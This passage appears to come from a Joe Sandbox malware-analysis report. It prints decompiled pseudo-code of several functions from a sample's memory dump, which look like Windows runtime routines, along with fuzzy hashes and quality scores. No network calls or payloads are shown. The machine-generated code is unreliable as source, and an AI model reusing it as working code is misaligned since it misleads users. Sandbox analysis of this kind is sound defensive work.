                                                                                                            					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                                                                            					if(_t79 != 0 && E010E6BA3() != 0) {
                                                                                                            						_push(0);
                                                                                                            						_push(0);
                                                                                                            						_push(0);
                                                                                                            						_push(0x1f0003);
                                                                                                            						_push( &_v64);
                                                                                                            						if(E010A9980() >= 0) {
                                                                                                            							E01082280(_t56, 0x1158778);
                                                                                                            							_t77 = 1;
                                                                                                            							_t68 = 1;
                                                                                                            							if( *0x1158774 == 0) {
                                                                                                            								asm("cdq");
                                                                                                            								 *(_t79 + 0xf70) = _v64;
                                                                                                            								 *(_t79 + 0xf74) = 0x100;
                                                                                                            								_t75 = 0;
                                                                                                            								_t73 = 4;
                                                                                                            								_v60 =  &_v68;
                                                                                                            								_v52 = _t73;
                                                                                                            								_v36 = _t73;
                                                                                                            								_t74 = _v76;
                                                                                                            								_v44 =  &_v72;
                                                                                                            								 *0x1158774 = 1;
                                                                                                            								_v56 = 0;
                                                                                                            								_v28 = _t74[2];
                                                                                                            								_v48 = 0;
                                                                                                            								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                                                                                            								_v40 = 0;
                                                                                                            								_v32 = 0;
                                                                                                            								_v24 = 0;
                                                                                                            								_v16 = 0;
                                                                                                            								if(E0106B6F0(0x104c338, 0x104c288, 3,  &_v60) == 0) {
                                                                                                            									_v80 = _v80 | 0xffffffff;
                                                                                                            									_push( &_v84);
                                                                                                            									_push(0);
                                                                                                            									_push(_v64);
                                                                                                            									_v84 = 0xfa0a1f00;
                                                                                                            									E010A9520();
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if(_v64 != 0) {
                                                                                                            					_push(_v64);
                                                                                                            					E010A95D0();
                                                                                                            					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                                                                                            					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                                                                                            				}
                                                                                                            				if(_t77 != 0) {
                                                                                                            					E0107FFB0(_t68, _t77, 0x1158778);
                                                                                                            				}
                                                                                                            				_pop(_t78);
                                                                                                            				return E010AB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                                                                                            			}

































                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f0e63c3b7bccf8ff3cea6976c8a36bf4ffd5488a714bb4fd82d40962bf7e4427
                                                                                                            • Instruction ID: ed521c5dabf7384d2727a88414b5c6127d6f535ab8c41fce1fe0ae8483658c0c
                                                                                                            • Opcode Fuzzy Hash: f0e63c3b7bccf8ff3cea6976c8a36bf4ffd5488a714bb4fd82d40962bf7e4427
                                                                                                            • Instruction Fuzzy Hash: 42417DB1D00209AFDB24DFAAD940BFEBBF4EF58714F18816AE994A7240DB719905CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 85%
                                                                                                            			E01065210(intOrPtr _a4, void* _a8) {
                                                                                                            				void* __ecx;
                                                                                                            				intOrPtr _t31;
                                                                                                            				signed int _t32;
                                                                                                            				signed int _t33;
                                                                                                            				intOrPtr _t35;
                                                                                                            				signed int _t52;
                                                                                                            				void* _t54;
                                                                                                            				void* _t56;
                                                                                                            				unsigned int _t59;
                                                                                                            				signed int _t60;
                                                                                                            				void* _t61;
                                                                                                            
                                                                                                            				_t61 = E010652A5(1);
                                                                                                            				if(_t61 == 0) {
                                                                                                            					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                                                            					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                                                                                            					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                                                                                            				} else {
                                                                                                            					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                                                                                            					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                                                                                            				}
                                                                                                            				_t60 = _t59 >> 1;
                                                                                                            				_t32 = 0x3a;
                                                                                                            				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                                                                                            					_t52 = _t60 + _t60;
                                                                                                            					if(_a4 > _t52) {
                                                                                                            						goto L5;
                                                                                                            					}
                                                                                                            					if(_t61 != 0) {
                                                                                                            						asm("lock xadd [esi], eax");
                                                                                                            						if((_t32 | 0xffffffff) == 0) {
                                                                                                            							_push( *((intOrPtr*)(_t61 + 4)));
                                                                                                            							E010A95D0();
                                                                                                            							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						E0107EB70(_t54, 0x11579a0);
                                                                                                            					}
                                                                                                            					_t26 = _t52 + 2; // 0xddeeddf0
                                                                                                            					return _t26;
                                                                                                            				} else {
                                                                                                            					_t52 = _t60 + _t60;
                                                                                                            					if(_a4 < _t52) {
                                                                                                            						if(_t61 != 0) {
                                                                                                            							asm("lock xadd [esi], eax");
                                                                                                            							if((_t32 | 0xffffffff) == 0) {
                                                                                                            								_push( *((intOrPtr*)(_t61 + 4)));
                                                                                                            								E010A95D0();
                                                                                                            								L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							E0107EB70(_t54, 0x11579a0);
                                                                                                            						}
                                                                                                            						return _t52;
                                                                                                            					}
                                                                                                            					L5:
                                                                                                            					_t33 = E010AF3E0(_a8, _t54, _t52);
                                                                                                            					if(_t61 == 0) {
                                                                                                            						E0107EB70(_t54, 0x11579a0);
                                                                                                            					} else {
                                                                                                            						asm("lock xadd [esi], eax");
                                                                                                            						if((_t33 | 0xffffffff) == 0) {
                                                                                                            							_push( *((intOrPtr*)(_t61 + 4)));
                                                                                                            							E010A95D0();
                                                                                                            							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t35 = _a8;
                                                                                                            					if(_t60 <= 1) {
                                                                                                            						L9:
                                                                                                            						_t60 = _t60 - 1;
                                                                                                            						 *((short*)(_t52 + _t35 - 2)) = 0;
                                                                                                            						goto L10;
                                                                                                            					} else {
                                                                                                            						_t56 = 0x3a;
                                                                                                            						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                                                                                                            							 *((short*)(_t52 + _t35)) = 0;
                                                                                                            							L10:
                                                                                                            							return _t60 + _t60;
                                                                                                            						}
                                                                                                            						goto L9;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 922458eca71c27772dc8c8556babb1ec6d3d66a745bd6edb9fc7063cfe4e7d57
                                                                                                            • Instruction ID: e2e7ff1292b2d9bbfa605880a657a85afeab29cdc7a39a609b2d77637814aa51
                                                                                                            • Opcode Fuzzy Hash: 922458eca71c27772dc8c8556babb1ec6d3d66a745bd6edb9fc7063cfe4e7d57
                                                                                                            • Instruction Fuzzy Hash: A2310831641602DBC766BB28CC81BAE7BA9FF50B60F11465EF9D50B1A4EB70E800CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E010A3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v12;
                                                                                                            				signed short** _t33;
                                                                                                            				short* _t38;
                                                                                                            				intOrPtr* _t39;
                                                                                                            				intOrPtr* _t41;
                                                                                                            				signed short _t43;
                                                                                                            				intOrPtr* _t47;
                                                                                                            				intOrPtr* _t53;
                                                                                                            				signed short _t57;
                                                                                                            				intOrPtr _t58;
                                                                                                            				signed short _t60;
                                                                                                            				signed short* _t61;
                                                                                                            
                                                                                                            				_t47 = __ecx;
                                                                                                            				_t61 = __edx;
                                                                                                            				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                                                                                            				if(_t60 > 0xfffe) {
                                                                                                            					L22:
                                                                                                            					return 0xc0000106;
                                                                                                            				}
                                                                                                            				if(__edx != 0) {
                                                                                                            					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                                                                                            						L5:
                                                                                                            						E01077B60(0, _t61, 0x10411c4);
                                                                                                            						_v12 =  *_t47;
                                                                                                            						_v12 = _v12 + 0xfff8;
                                                                                                            						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                                                                                            						E01077B60(0xfff8, _t61,  &_v12);
                                                                                                            						_t33 = _a8;
                                                                                                            						if(_t33 != 0) {
                                                                                                            							 *_t33 = _t61;
                                                                                                            						}
                                                                                                            						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                            						_t53 = _a12;
                                                                                                            						if(_t53 != 0) {
                                                                                                            							_t57 = _t61[2];
                                                                                                            							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                                                                                            							while(_t38 >= _t57) {
                                                                                                            								if( *_t38 == 0x5c) {
                                                                                                            									_t41 = _t38 + 2;
                                                                                                            									if(_t41 == 0) {
                                                                                                            										break;
                                                                                                            									}
                                                                                                            									_t58 = 0;
                                                                                                            									if( *_t41 == 0) {
                                                                                                            										L19:
                                                                                                            										 *_t53 = _t58;
                                                                                                            										goto L7;
                                                                                                            									}
                                                                                                            									 *_t53 = _t41;
                                                                                                            									goto L7;
                                                                                                            								}
                                                                                                            								_t38 = _t38 - 2;
                                                                                                            							}
                                                                                                            							_t58 = 0;
                                                                                                            							goto L19;
                                                                                                            						} else {
                                                                                                            							L7:
                                                                                                            							_t39 = _a16;
                                                                                                            							if(_t39 != 0) {
                                                                                                            								 *_t39 = 0;
                                                                                                            								 *((intOrPtr*)(_t39 + 4)) = 0;
                                                                                                            								 *((intOrPtr*)(_t39 + 8)) = 0;
                                                                                                            								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                                                                                            							}
                                                                                                            							return 0;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t61 = _a4;
                                                                                                            					if(_t61 != 0) {
                                                                                                            						L3:
                                                                                                            						_t43 = L01084620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                                                                                            						_t61[2] = _t43;
                                                                                                            						if(_t43 == 0) {
                                                                                                            							return 0xc0000017;
                                                                                                            						}
                                                                                                            						_t61[1] = _t60;
                                                                                                            						 *_t61 = 0;
                                                                                                            						goto L5;
                                                                                                            					}
                                                                                                            					goto L22;
                                                                                                            				}
                                                                                                            				_t61 = _a4;
                                                                                                            				if(_t61 == 0) {
                                                                                                            					return 0xc000000d;
                                                                                                            				}
                                                                                                            				goto L3;
                                                                                                            			}

















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 45d12f5be14866452d30bf7de8b63d9d8004a74e2b5bfcd63ab135316484e664
                                                                                                            • Instruction ID: 8120c6576c382a01fdd3d97e60e4411f92225c7d59243525443dbd80f2872428
                                                                                                            • Opcode Fuzzy Hash: 45d12f5be14866452d30bf7de8b63d9d8004a74e2b5bfcd63ab135316484e664
                                                                                                            • Instruction Fuzzy Hash: B931CD31A00611DBD765DFADE841A7ABBE4FF45700B4680AAE98ACF390E730D840C790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E0109A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				intOrPtr _t35;
                                                                                                            				intOrPtr _t39;
                                                                                                            				intOrPtr _t45;
                                                                                                            				intOrPtr* _t51;
                                                                                                            				intOrPtr* _t52;
                                                                                                            				intOrPtr* _t55;
                                                                                                            				signed int _t57;
                                                                                                            				intOrPtr* _t59;
                                                                                                            				intOrPtr _t68;
                                                                                                            				intOrPtr* _t77;
                                                                                                            				void* _t79;
                                                                                                            				signed int _t80;
                                                                                                            				intOrPtr _t81;
                                                                                                            				char* _t82;
                                                                                                            				void* _t83;
                                                                                                            
                                                                                                            				_push(0x24);
                                                                                                            				_push(0x1140220);
                                                                                                            				E010BD08C(__ebx, __edi, __esi);
                                                                                                            				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                                                                                            				_t79 = __ecx;
                                                                                                            				_t35 =  *0x1157b9c; // 0x0
                                                                                                            				_t55 = L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                                                                                            				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                                                                                            				if(_t55 == 0) {
                                                                                                            					_t39 = 0xc0000017;
                                                                                                            					L11:
                                                                                                            					return E010BD0D1(_t39);
                                                                                                            				}
                                                                                                            				_t68 = 0;
                                                                                                            				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                                                                                            				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                                                                                            				_t7 = _t55 + 8; // 0x8
                                                                                                            				_t57 = 6;
                                                                                                            				memcpy(_t7, _t79, _t57 << 2);
                                                                                                            				_t80 = 0xfffffffe;
                                                                                                            				 *(_t83 - 4) = _t80;
                                                                                                            				if(0 < 0) {
                                                                                                            					L14:
                                                                                                            					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                                                                            					L20:
                                                                                                            					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                                                                                            					_t39 = _t81;
                                                                                                            					goto L11;
                                                                                                            				}
                                                                                                            				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                                                                                            					_t81 = 0xc000007b;
                                                                                                            					goto L20;
                                                                                                            				}
                                                                                                            				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                                                                                            					_t59 =  *((intOrPtr*)(_t83 + 8));
                                                                                                            					_t45 =  *_t59;
                                                                                                            					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                                                                                            					 *_t59 = _t45 + 1;
                                                                                                            					L6:
                                                                                                            					 *(_t83 - 4) = 1;
                                                                                                            					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                                                                                            					 *(_t83 - 4) = _t80;
                                                                                                            					if(_t68 < 0) {
                                                                                                            						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                                                                                            						if(_t82 == 0) {
                                                                                                            							goto L14;
                                                                                                            						}
                                                                                                            						asm("btr eax, ecx");
                                                                                                            						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                                                                            						if( *_t82 != 0) {
                                                                                                            							 *0x1157b10 =  *0x1157b10 - 8;
                                                                                                            						}
                                                                                                            						goto L20;
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                                                                                            					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                                                                                            					_t51 =  *0x115536c; // 0x77495368
                                                                                                            					if( *_t51 != 0x1155368) {
                                                                                                            						_push(3);
                                                                                                            						asm("int 0x29");
                                                                                                            						goto L14;
                                                                                                            					}
                                                                                                            					 *_t55 = 0x1155368;
                                                                                                            					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                                                                                            					 *_t51 = _t55;
                                                                                                            					 *0x115536c = _t55;
                                                                                                            					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                                                                                            					if(_t52 != 0) {
                                                                                                            						 *_t52 = _t55;
                                                                                                            					}
                                                                                                            					_t39 = 0;
                                                                                                            					goto L11;
                                                                                                            				}
                                                                                                            				_t77 =  *((intOrPtr*)(_t83 + 8));
                                                                                                            				_t68 = E0109A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                                                                                            				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                                                                                            				if(_t68 < 0) {
                                                                                                            					goto L14;
                                                                                                            				}
                                                                                                            				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                                                                                            				goto L6;
                                                                                                            			}



















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 10d0b4644fc490368e77fe09112e2c50005cba5dec4750df822600a0f61760ad
                                                                                                            • Instruction ID: aed5b524d4b0a948e9646458f5b8309811da00d5671ac0592156926363be3f23
                                                                                                            • Opcode Fuzzy Hash: 10d0b4644fc490368e77fe09112e2c50005cba5dec4750df822600a0f61760ad
                                                                                                            • Instruction Fuzzy Hash: 7E4198B5A00315DFCF58CF58C990B9DBBF2FB89314F1980A9E959AB384C774A941CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 68%
                                                                                                            			E0108C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                                                                                            				signed int* _v8;
                                                                                                            				char _v16;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				signed char _t33;
                                                                                                            				signed char _t43;
                                                                                                            				signed char _t48;
                                                                                                            				signed char _t62;
                                                                                                            				void* _t63;
                                                                                                            				intOrPtr _t69;
                                                                                                            				intOrPtr _t71;
                                                                                                            				unsigned int* _t82;
                                                                                                            				void* _t83;
                                                                                                            
                                                                                                            				_t80 = __ecx;
                                                                                                            				_t82 = __edx;
                                                                                                            				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                                                                                            				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                                                                                            				if((_t33 & 0x00000001) != 0) {
                                                                                                            					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                                                                                            					if(E01087D50() != 0) {
                                                                                                            						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                            					} else {
                                                                                                            						_t43 = 0x7ffe0386;
                                                                                                            					}
                                                                                                            					if( *_t43 != 0) {
                                                                                                            						_t43 = E01138D34(_v8, _t80);
                                                                                                            					}
                                                                                                            					E01082280(_t43, _t82);
                                                                                                            					if( *((char*)(_t80 + 0xdc)) == 0) {
                                                                                                            						E0107FFB0(_t62, _t80, _t82);
                                                                                                            						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                                                                                            						_t30 = _t80 + 0xd0; // 0xd0
                                                                                                            						_t83 = _t30;
                                                                                                            						E01138833(_t83,  &_v16);
                                                                                                            						_t81 = _t80 + 0x90;
                                                                                                            						E0107FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                                                                                            						_t63 = 0;
                                                                                                            						_push(0);
                                                                                                            						_push(_t83);
                                                                                                            						_t48 = E010AB180();
                                                                                                            						if(_a4 != 0) {
                                                                                                            							E01082280(_t48, _t81);
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t69 = _v8;
                                                                                                            						_t12 = _t80 + 0x98; // 0x98
                                                                                                            						_t13 = _t69 + 0xc; // 0x575651ff
                                                                                                            						E0108BB2D(_t13, _t12);
                                                                                                            						_t71 = _v8;
                                                                                                            						_t15 = _t80 + 0xb0; // 0xb0
                                                                                                            						_t16 = _t71 + 8; // 0x8b000cc2
                                                                                                            						E0108BB2D(_t16, _t15);
                                                                                                            						E0108B944(_v8, _t62);
                                                                                                            						 *((char*)(_t80 + 0xdc)) = 0;
                                                                                                            						E0107FFB0(0, _t80, _t82);
                                                                                                            						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                                                                                            						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                                                                                            						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                                                                                            						 *(_t80 + 0xde) = 0;
                                                                                                            						if(_a4 == 0) {
                                                                                                            							_t25 = _t80 + 0x90; // 0x90
                                                                                                            							E0107FFB0(0, _t80, _t25);
                                                                                                            						}
                                                                                                            						_t63 = 1;
                                                                                                            					}
                                                                                                            					return _t63;
                                                                                                            				}
                                                                                                            				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                                                                                            				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                                                                                            				if(_a4 == 0) {
                                                                                                            					_t24 = _t80 + 0x90; // 0x90
                                                                                                            					E0107FFB0(0, __ecx, _t24);
                                                                                                            				}
                                                                                                            				return 0;
                                                                                                            			}

















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                            • Instruction ID: 88dfa9cc575b21e326b4969ff47b900c4dee607f39079484079167f2b892edc8
                                                                                                            • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                            • Instruction Fuzzy Hash: 80314871A09687BEEB45FBB4C580BEDFBA4BF52204F04419AD4DC47241DB346A05C7E0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 76%
                                                                                                            			E010E7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                                                                                            				signed int _v8;
                                                                                                            				char _v588;
                                                                                                            				intOrPtr _v592;
                                                                                                            				intOrPtr _v596;
                                                                                                            				signed short* _v600;
                                                                                                            				char _v604;
                                                                                                            				short _v606;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed short* _t55;
                                                                                                            				void* _t56;
                                                                                                            				signed short* _t58;
                                                                                                            				signed char* _t61;
                                                                                                            				char* _t68;
                                                                                                            				void* _t69;
                                                                                                            				void* _t71;
                                                                                                            				void* _t72;
                                                                                                            				signed int _t75;
                                                                                                            
                                                                                                            				_t64 = __edx;
                                                                                                            				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                                                                                            				_v8 =  *0x115d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                                                                                            				_t55 = _a16;
                                                                                                            				_v606 = __ecx;
                                                                                                            				_t71 = 0;
                                                                                                            				_t58 = _a12;
                                                                                                            				_v596 = __edx;
                                                                                                            				_v600 = _t58;
                                                                                                            				_t68 =  &_v588;
                                                                                                            				if(_t58 != 0) {
                                                                                                            					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                                                                                            					if(_t55 != 0) {
                                                                                                            						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t8 = _t71 + 0x2a; // 0x28
                                                                                                            				_t33 = _t8;
                                                                                                            				_v592 = _t8;
                                                                                                            				if(_t71 <= 0x214) {
                                                                                                            					L6:
                                                                                                            					 *((short*)(_t68 + 6)) = _v606;
                                                                                                            					if(_t64 != 0xffffffff) {
                                                                                                            						asm("cdq");
                                                                                                            						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                                                                                            						 *((char*)(_t68 + 0x28)) = _a4;
                                                                                                            						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                                                                                            						 *((char*)(_t68 + 0x29)) = _a8;
                                                                                                            						if(_t71 != 0) {
                                                                                                            							_t22 = _t68 + 0x2a; // 0x2a
                                                                                                            							_t64 = _t22;
                                                                                                            							E010E6B4C(_t58, _t22, _t71,  &_v604);
                                                                                                            							if(_t55 != 0) {
                                                                                                            								_t25 = _v604 + 0x2a; // 0x2a
                                                                                                            								_t64 = _t25 + _t68;
                                                                                                            								E010E6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                                                                                            							}
                                                                                                            							if(E01087D50() == 0) {
                                                                                                            								_t61 = 0x7ffe0384;
                                                                                                            							} else {
                                                                                                            								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                            							}
                                                                                                            							_push(_t68);
                                                                                                            							_push(_v592 + 0xffffffe0);
                                                                                                            							_push(0x402);
                                                                                                            							_push( *_t61 & 0x000000ff);
                                                                                                            							E010A9AE0();
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t35 =  &_v588;
                                                                                                            					if( &_v588 != _t68) {
                                                                                                            						_t35 = L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                                                                                            					}
                                                                                                            					L16:
                                                                                                            					_pop(_t69);
                                                                                                            					_pop(_t72);
                                                                                                            					_pop(_t56);
                                                                                                            					return E010AB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                                                                                            				}
                                                                                                            				_t68 = L01084620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                                                                                            				if(_t68 == 0) {
                                                                                                            					goto L16;
                                                                                                            				} else {
                                                                                                            					_t58 = _v600;
                                                                                                            					_t64 = _v596;
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            			}























                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1a276b01b1881d48786ca820a57597900652c5f45372715de89b649906e92d72
                                                                                                            • Instruction ID: 6361a66fe7fd6589f23311074e4461436681fd8da277c3c417c8892887082f1f
                                                                                                            • Opcode Fuzzy Hash: 1a276b01b1881d48786ca820a57597900652c5f45372715de89b649906e92d72
                                                                                                            • Instruction Fuzzy Hash: 3F31B1726087519FC320DF6DC944AAAB7E9BFD8600F044A69F9E587690E730E904C7E6
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 70%
                                                                                                            			E01113D40(intOrPtr __ecx, char* __edx) {
                                                                                                            				signed int _v8;
                                                                                                            				char* _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				signed char _v24;
                                                                                                            				char _v28;
                                                                                                            				char _v29;
                                                                                                            				intOrPtr* _v32;
                                                                                                            				char _v36;
                                                                                                            				char _v37;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed char _t34;
                                                                                                            				intOrPtr* _t37;
                                                                                                            				intOrPtr* _t42;
                                                                                                            				intOrPtr* _t47;
                                                                                                            				intOrPtr* _t48;
                                                                                                            				intOrPtr* _t49;
                                                                                                            				char _t51;
                                                                                                            				void* _t52;
                                                                                                            				intOrPtr* _t53;
                                                                                                            				char* _t55;
                                                                                                            				char _t59;
                                                                                                            				char* _t61;
                                                                                                            				intOrPtr* _t64;
                                                                                                            				void* _t65;
                                                                                                            				char* _t67;
                                                                                                            				void* _t68;
                                                                                                            				signed int _t70;
                                                                                                            
                                                                                                            				_t62 = __edx;
                                                                                                            				_t72 = (_t70 & 0xfffffff8) - 0x1c;
                                                                                                            				_v8 =  *0x115d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
                                                                                                            				_t34 =  &_v28;
                                                                                                            				_v20 = __ecx;
                                                                                                            				_t67 = __edx;
                                                                                                            				_v24 = _t34;
                                                                                                            				_t51 = 0;
                                                                                                            				_v12 = __edx;
                                                                                                            				_v29 = 0;
                                                                                                            				_v28 = _t34;
                                                                                                            				E01082280(_t34, 0x1158a6c);
                                                                                                            				_t64 =  *0x1155768; // 0x77495768
                                                                                                            				if(_t64 != 0x1155768) {
                                                                                                            					while(1) {
                                                                                                            						_t8 = _t64 + 8; // 0x77495770
                                                                                                            						_t42 = _t8;
                                                                                                            						_t53 = _t64;
                                                                                                            						 *_t42 =  *_t42 + 1;
                                                                                                            						_v16 = _t42;
                                                                                                            						E0107FFB0(_t53, _t64, 0x1158a6c);
                                                                                                            						 *0x115b1e0(_v24, _t67);
                                                                                                            						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
                                                                                                            							_v37 = 1;
                                                                                                            						}
                                                                                                            						E01082280(_t45, 0x1158a6c);
                                                                                                            						_t47 = _v28;
